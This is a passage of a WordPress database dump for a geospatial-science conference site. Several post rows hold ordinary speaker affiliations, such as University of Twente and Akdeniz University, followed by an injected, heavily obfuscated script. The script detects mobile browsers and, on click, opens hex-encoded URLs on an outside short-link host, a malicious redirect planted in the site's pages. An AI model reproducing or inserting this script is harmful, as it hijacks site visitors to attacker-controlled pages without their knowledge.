x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Public Health Data Handling, Analysis and Visualisation using Spatial Science','','inherit','closed','closed','','3681-revision-v1','','','2023-02-02 08:10:49','2023-02-02 08:10:49','',3681,'https://gsw2023.com/?p=3690',0,'revision','',0),
(3691,1,'2023-02-02 08:14:30','2023-02-02 08:14:30','','tut1','','inherit','open','closed','','tut1','','','2023-02-02 08:14:30','2023-02-02 08:14:30','',3688,'https://gsw2023.com/wp-content/uploads/2023/02/tut1.jpg',0,'attachment','image/jpeg',0),
(3693,1,'2023-02-02 08:22:06','2023-02-02 08:22:06','<!-- wp:paragraph -->\n<p>Faculty of Geo-Information Science &amp; Earth Observation, University of Twente, The NL</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ISPRS Co-Chair, WG IV/10</strong></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','DR.Frank B Osei  ','','publish','closed','closed','','frank-b-osei','','','2023-02-07 00:59:04','2023-02-07 00:59:04','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3693',0,'dt_team','',0),
(3694,1,'2023-02-02 08:21:36','2023-02-02 08:21:36','','tut2','','inherit','open','closed','','tut2','','','2023-02-02 08:21:36','2023-02-02 08:21:36','',3693,'https://gsw2023.com/wp-content/uploads/2023/02/tut2.jpg',0,'attachment','image/jpeg',0),
(3696,1,'2023-02-02 08:27:46','2023-02-02 08:27:46','<!-- wp:paragraph -->\n<p>Department of Urban and Regional Planning, Akdeniz University, TURKEY</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ISPRS Co-Chair, WG IV/10</strong></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 